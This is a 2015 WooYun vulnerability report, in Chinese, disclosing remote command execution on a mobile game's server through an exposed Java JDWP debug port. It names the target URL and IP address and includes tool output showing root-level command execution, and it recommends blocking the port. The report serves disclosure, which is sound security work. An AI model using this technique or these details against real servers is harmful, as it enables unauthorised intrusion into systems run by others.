当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144546

漏洞标题:《新秦时明月》手游-主服务器命令执行漏洞

相关厂商:杭州玄机科技信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-10-02 19:32

修复时间:2015-11-16 19:34

公开时间:2015-11-16 19:34

漏洞类型:命令执行

危害等级:高

自评Rank:19

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国庆看了看 《秦时明月之君临天下》 。。。 然后下来手游玩玩,最后发现可以shell ...
欢迎交流我在S4服,马甲是:我是帅哥

详细说明:

http://tf001.qs.6yoo.com/qs/RemotingServlet


发现这是他接口服务器
扫描端口,发现

tcp port:5800java-jdwp


漏洞证明:

[+] Targeting '123.59.85.138:5800'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.7.0_51'
[+] Found Runtime class: id=1341
[+] Found Runtime.getRuntime(): id=7f47c414ba40
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x1dba
[+] Found Operating System 'Linux'
[+] Found User name 'root'
[+] Found ClassPath '/usr/local/qs/server/gameser01/bin/bootstrap.jar:/usr/local/qs/server/gameser01/bin/tomcat-juli.jar'
[+] Found User home directory '/root'
[!] Command successfully executed
[+] Targeting '123.59.85.138:5800'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.7.0_51'
[+] Found Runtime class: id=1341
[+] Found Runtime.getRuntime(): id=7f47c414ba40
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[-] Exception: unpack requires a string argument of length 4
路径:/data/qs/server/gameser02/work/
测试多了几次好像端口都访问不了.忘记截图了...


修复方案:

屏蔽端口,不能对外开放.

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝